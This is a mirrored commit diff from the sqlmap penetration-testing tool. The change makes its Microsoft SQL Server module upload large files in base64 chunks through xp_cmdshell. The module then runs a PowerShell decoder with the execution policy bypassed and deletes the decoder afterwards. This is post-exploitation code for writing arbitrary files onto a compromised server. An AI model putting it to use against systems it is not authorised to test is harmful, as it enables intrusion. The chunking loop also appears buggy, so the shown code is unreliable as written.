sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-16 02:53:21 +03:00
Code Issues Packages Projects Releases Wiki Activity

working on allowing large files to be uploaded via powershell - issue #742

Browse Source
This commit is contained in:
Bernardo Damele 2014-06-30 23:53:04 +01:00
parent e34be17255
commit 3e431ec202
1 changed files with 20 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
plugins/dbms/mssqlserver/filesystem.py
View File

@ -169,16 +169,31 @@ class Filesystem(GenericFilesystem):
infoMsg += "to file '%s'" % dFile infoMsg += "to file '%s'" % dFile
logger.info(infoMsg) logger.info(infoMsg)
encodedFileContent = base64encode(wFileContent)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\%s" % (tmpPath, randPSScript)
encodedFileContent = base64encode(wFileContent) wFileSize = len(wFileContent)
psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile) chunkMaxSize = 1024
logger.debug("uploading the PowerShell script to %s, please wait.." % randPSScriptPath) logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
for i in xrange(0, wFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
#psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile)
psString = "$Base64 = Get-Content -Path %s; $Content = " % encodedBase64FilePath
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path %s -Value $Content -Encoding Byte" % dFile
logger.debug("uploading the PowerShell base64-decoding script to %s, please wait.." % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
logger.debug("executing the PowerShell script to write the %s file" % dFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file" % dFile)
commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % randPSScriptPath) "del /F /Q \"%s\"" % randPSScriptPath)
@ -207,7 +222,6 @@ class Filesystem(GenericFilesystem):
complComm = " & ".join(command for command in commands) complComm = " & ".join(command for command in commands)
self.execCmd(complComm) self.execCmd(complComm)
else: else:
debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "sqlmap will split it into chunks locally, upload "
@ -305,7 +319,7 @@ class Filesystem(GenericFilesystem):
End Function""" % (randFilePath, dFile) End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "") vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1] encodedFileContent = base64encode(wFileContent)
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)